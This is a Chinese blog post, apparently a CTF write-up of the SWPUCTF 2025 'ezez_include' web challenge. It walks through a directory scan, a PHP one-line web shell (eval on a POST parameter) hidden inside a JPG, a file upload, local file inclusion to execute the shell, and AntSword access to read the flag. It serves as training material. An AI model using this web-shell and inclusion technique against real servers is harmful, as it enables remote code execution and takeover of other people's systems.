CTF-SWPUCTF2025秋季新生赛4
题目来源:NSSCTF
练习时间:2026年2月3日
练习数量:1
上篇:CTF-SWPUCTF2025秋季新生赛3
下篇:CTF-SWPUCTF2025秋季新生赛5
📖 SWPUCTF 2025 秋季新生赛合集:
1️⃣CTF-SWPUCTF2025秋季新生赛1
2️⃣CTF-SWPUCTF2025秋季新生赛2
3️⃣CTF-SWPUCTF2025秋季新生赛3
4️⃣CTF-SWPUCTF2025秋季新生赛4
5️⃣CTF-SWPUCTF2025秋季新生赛5
⭐️ 13 [SWPUCTF 2025 秋季新生赛]ezez_include
🚩flag:NSSCTF{0bcf4985-3ef7-4664-9e7a-b864ee217ce2}
💡hint:WEB 文件上传 文件包含 目录扫描
🔧tool:antsword dirsearch
文件包含漏洞LFI:应用程序在未对用户可控输入进行严格校验的情况下,将其用于文件包含操作,导致攻击者能够读取或执行服务器上的本地文件的安全漏洞。
目录扫描工具dirsearch的下载:https://github.com/maurosoria/dirsearch
基本使用方法(示例):
python3 dirsearch.py -u http://node1.anna.nssctf.cn:20739 |
扫描结果:
访问/upload.php/
制作一句话图片马方法:
eval($_POST['cmd']); |
然后找到一张图片tp.jpg:
copy tp.jpg/b+muma.php shell.jpg |
在linux系统中的命令是:
cat tp.jpg muma.php > shell.jpg |
制作出的shell图片:
上传成功:
后续其实用的是muma.jpg(直接改了后缀)
在index.php界面读取upload/{你上传的文件}.jpg
发现确实以php格式运行
访问完成后,可以用蚁剑。
具体配置如下:

最后在根目录找到了flag:
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 SereniusX的博客!
评论